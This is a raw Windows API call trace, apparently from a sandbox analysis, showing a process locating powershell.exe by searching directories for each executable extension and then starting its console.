	[0664.643] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c7ad9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0664.643] SetErrorMode (uMode=0x1) returned 0x1
	[0664.643] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.JS", lpFindFileData=0x1c7adb40 | out: lpFindFileData=0x1c7adb40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0664.643] SetErrorMode (uMode=0x1) returned 0x1
	[0664.643] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c7ad9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0664.644] SetErrorMode (uMode=0x1) returned 0x1
	[0664.644] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.JSE", lpFindFileData=0x1c7adb40 | out: lpFindFileData=0x1c7adb40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0664.644] SetErrorMode (uMode=0x1) returned 0x1
	[0664.644] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c7ad9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0664.644] SetErrorMode (uMode=0x1) returned 0x1
	[0664.644] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.WSF", lpFindFileData=0x1c7adb40 | out: lpFindFileData=0x1c7adb40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0664.645] SetErrorMode (uMode=0x1) returned 0x1
	[0664.645] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c7ad9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0664.645] SetErrorMode (uMode=0x1) returned 0x1
	[0664.645] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.WSH", lpFindFileData=0x1c7adb40 | out: lpFindFileData=0x1c7adb40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0664.646] SetErrorMode (uMode=0x1) returned 0x1
	[0664.646] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c7ad9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0664.646] SetErrorMode (uMode=0x1) returned 0x1
	[0664.646] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.MSC", lpFindFileData=0x1c7adb40 | out: lpFindFileData=0x1c7adb40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0664.646] SetErrorMode (uMode=0x1) returned 0x1
	[0664.646] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c7ad9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0664.647] SetErrorMode (uMode=0x1) returned 0x1
	[0664.647] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell", lpFindFileData=0x1c7adb40 | out: lpFindFileData=0x1c7adb40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0664.647] SetErrorMode (uMode=0x1) returned 0x1
	[0664.647] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c7ad9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0664.647] SetErrorMode (uMode=0x1) returned 0x1
	[0664.647] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.ps1", lpFindFileData=0x1c7adb40 | out: lpFindFileData=0x1c7adb40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0664.648] SetErrorMode (uMode=0x1) returned 0x1
	[0664.648] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c7ad9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0664.648] SetErrorMode (uMode=0x1) returned 0x1
	[0664.648] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.psm1", lpFindFileData=0x1c7adb40 | out: lpFindFileData=0x1c7adb40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0664.648] SetErrorMode (uMode=0x1) returned 0x1
	[0664.649] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c7ad9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0664.649] SetErrorMode (uMode=0x1) returned 0x1
	[0664.649] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.psd1", lpFindFileData=0x1c7adb40 | out: lpFindFileData=0x1c7adb40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0664.649] SetErrorMode (uMode=0x1) returned 0x1
	[0664.649] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c7ad9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0664.649] SetErrorMode (uMode=0x1) returned 0x1
	[0664.650] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.COM", lpFindFileData=0x1c7adb40 | out: lpFindFileData=0x1c7adb40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0664.650] SetErrorMode (uMode=0x1) returned 0x1
	[0664.650] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c7ad9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0664.650] SetErrorMode (uMode=0x1) returned 0x1
	[0664.650] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.EXE", lpFindFileData=0x1c7adb40 | out: lpFindFileData=0x1c7adb40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0664.650] SetErrorMode (uMode=0x1) returned 0x1
	[0664.651] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c7ad9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0664.651] SetErrorMode (uMode=0x1) returned 0x1
	[0664.651] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.BAT", lpFindFileData=0x1c7adb40 | out: lpFindFileData=0x1c7adb40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0664.651] SetErrorMode (uMode=0x1) returned 0x1
	[0664.651] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c7ad9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0664.652] SetErrorMode (uMode=0x1) returned 0x1
	[0664.652] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.CMD", lpFindFileData=0x1c7adb40 | out: lpFindFileData=0x1c7adb40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0664.652] SetErrorMode (uMode=0x1) returned 0x1
	[0664.652] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c7ad9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0664.652] SetErrorMode (uMode=0x1) returned 0x1
	[0664.652] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.VBS", lpFindFileData=0x1c7adb40 | out: lpFindFileData=0x1c7adb40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0664.653] SetErrorMode (uMode=0x1) returned 0x1
	[0664.653] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c7ad9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0664.653] SetErrorMode (uMode=0x1) returned 0x1
	[0664.653] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.VBE", lpFindFileData=0x1c7adb40 | out: lpFindFileData=0x1c7adb40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0664.653] SetErrorMode (uMode=0x1) returned 0x1
	[0664.654] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c7ad9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0664.654] SetErrorMode (uMode=0x1) returned 0x1
	[0664.654] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.JS", lpFindFileData=0x1c7adb40 | out: lpFindFileData=0x1c7adb40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0664.654] SetErrorMode (uMode=0x1) returned 0x1
	[0664.654] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c7ad9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0664.654] SetErrorMode (uMode=0x1) returned 0x1
	[0664.655] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.JSE", lpFindFileData=0x1c7adb40 | out: lpFindFileData=0x1c7adb40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0664.655] SetErrorMode (uMode=0x1) returned 0x1
	[0664.655] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c7ad9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0664.655] SetErrorMode (uMode=0x1) returned 0x1
	[0664.655] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.WSF", lpFindFileData=0x1c7adb40 | out: lpFindFileData=0x1c7adb40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0664.656] SetErrorMode (uMode=0x1) returned 0x1
	[0664.656] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c7ad9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0664.656] SetErrorMode (uMode=0x1) returned 0x1
	[0664.656] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.WSH", lpFindFileData=0x1c7adb40 | out: lpFindFileData=0x1c7adb40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0664.656] SetErrorMode (uMode=0x1) returned 0x1
	[0664.657] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c7ad9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0664.657] SetErrorMode (uMode=0x1) returned 0x1
	[0664.657] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.MSC", lpFindFileData=0x1c7adb40 | out: lpFindFileData=0x1c7adb40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0664.657] SetErrorMode (uMode=0x1) returned 0x1
	[0664.657] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c7ad9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0664.657] SetErrorMode (uMode=0x1) returned 0x1
	[0664.658] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell", lpFindFileData=0x1c7adb40 | out: lpFindFileData=0x1c7adb40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0664.658] SetErrorMode (uMode=0x1) returned 0x1
	[0664.658] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c7ad9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0664.658] SetErrorMode (uMode=0x1) returned 0x1
	[0664.658] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.ps1", lpFindFileData=0x1c7adb40 | out: lpFindFileData=0x1c7adb40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0664.659] SetErrorMode (uMode=0x1) returned 0x1
	[0664.659] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c7ad9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0664.659] SetErrorMode (uMode=0x1) returned 0x1
	[0664.659] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.psm1", lpFindFileData=0x1c7adb40 | out: lpFindFileData=0x1c7adb40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0664.659] SetErrorMode (uMode=0x1) returned 0x1
	[0664.659] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c7ad9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0664.660] SetErrorMode (uMode=0x1) returned 0x1
	[0664.660] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.psd1", lpFindFileData=0x1c7adb40 | out: lpFindFileData=0x1c7adb40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0664.660] SetErrorMode (uMode=0x1) returned 0x1
	[0664.660] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c7ad9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0664.660] SetErrorMode (uMode=0x1) returned 0x1
	[0664.660] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.COM", lpFindFileData=0x1c7adb40 | out: lpFindFileData=0x1c7adb40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0664.661] SetErrorMode (uMode=0x1) returned 0x1
	[0664.661] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c7ad9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0664.661] SetErrorMode (uMode=0x1) returned 0x1
	[0664.661] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.EXE", lpFindFileData=0x1c7adb40 | out: lpFindFileData=0x1c7adb40*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82dd7f7c, ftCreationTime.dwHighDateTime=0x1ca0414, ftLastAccessTime.dwLowDateTime=0x82dd7f7c, ftLastAccessTime.dwHighDateTime=0x1ca0414, ftLastWriteTime.dwLowDateTime=0xe84fc9b0, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x73a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="powershell.exe", cAlternateFileName="")) returned 0x1b3cb3b0
	[0664.662] FindNextFileW (in: hFindFile=0x1b3cb3b0, lpFindFileData=0x1c7adb50 | out: lpFindFileData=0x1c7adb50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82dd7f7c, ftCreationTime.dwHighDateTime=0x1ca0414, ftLastAccessTime.dwLowDateTime=0x82dd7f7c, ftLastAccessTime.dwHighDateTime=0x1ca0414, ftLastWriteTime.dwLowDateTime=0xe84fc9b0, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x73a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="powershell.exe", cAlternateFileName="")) returned 0
	[0664.662] FindClose (in: hFindFile=0x1b3cb3b0 | out: hFindFile=0x1b3cb3b0) returned 1
	[0664.663] SetErrorMode (uMode=0x1) returned 0x1
	[0664.663] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", nBufferLength=0x105, lpBuffer=0x1c7adc60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpFilePart=0x0) returned 0x39
	[0664.664] SetErrorMode (uMode=0x1) returned 0x1
	[0664.664] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"), fInfoLevelId=0x0, lpFileInformation=0x1c7ade70 | out: lpFileInformation=0x1c7ade70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82dd7f7c, ftCreationTime.dwHighDateTime=0x1ca0414, ftLastAccessTime.dwLowDateTime=0x82dd7f7c, ftLastAccessTime.dwHighDateTime=0x1ca0414, ftLastWriteTime.dwLowDateTime=0xe84fc9b0, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x73a00)) returned 1
	[0664.664] SetErrorMode (uMode=0x1) returned 0x1
	[0664.665] CoTaskMemAlloc (cb=0x104) returned 0x2a8ab0
	[0664.665] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a8ab0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0664.665] CoTaskMemFree (pv=0x2a8ab0) 
	[0664.667] CoTaskMemAlloc (cb=0x104) returned 0x2a8ab0
	[0664.667] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a8ab0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0664.667] CoTaskMemFree (pv=0x2a8ab0) 
	[0664.672] CoTaskMemAlloc (cb=0x104) returned 0x2a8ab0
	[0664.672] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a8ab0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0664.672] CoTaskMemFree (pv=0x2a8ab0) 
	[0666.381] CoTaskMemAlloc (cb=0x104) returned 0x2a8ab0
	[0666.382] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a8ab0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0666.382] CoTaskMemFree (pv=0x2a8ab0) 
	[0666.395] CoTaskMemAlloc (cb=0x3b) returned 0x1b403560
	[0666.395] SHGetFileInfoA (in: pszPath="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", dwFileAttributes=0x0, psfi=0x1c7ae058, cbFileInfo=0x168, uFlags=0x2000 | out: psfi=0x1c7ae058) returned 0x4550
	[0666.396] CoTaskMemFree (pv=0x1b403560) 
	[0666.399] GetConsoleWindow () returned 0x102c8
	[0668.093] CoTaskMemAlloc (cb=0x104) returned 0x2a8ab0
